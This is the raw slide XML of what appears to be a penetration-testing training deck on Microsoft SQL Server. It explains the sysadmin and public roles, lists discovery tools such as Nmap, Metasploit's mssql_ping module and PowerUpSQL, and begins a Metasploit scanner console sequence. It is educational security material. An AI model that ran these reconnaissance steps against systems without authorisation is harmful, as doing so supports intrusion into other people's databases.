                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As far as MS SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concerned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>come</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>across</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> role </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public role</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can</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seen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>equivalent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL Server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> public role </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> role, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>theory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>someone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL Server. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>something</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Everyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in Windows.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183665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EAC3-212A-754D-BF81-0622FCB5A9C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Locating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Accessing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68424373-B88E-0842-8F47-9E9610E8AA1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>MS SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>identification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> TCP/UDP port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>performed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> such as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>SQLping3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>OSQL/SQLCMD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>MSF’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mssql_ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> module </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>PowerUpSQL</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29185FC9-6765-8E4A-8E39-29548E005F92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719403" y="4581128"/>
            <a:ext cx="11041227" cy="10770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defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mssql_ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mssql_ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2133" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) &gt; set RHOSTS </a:t>
            </a:r>
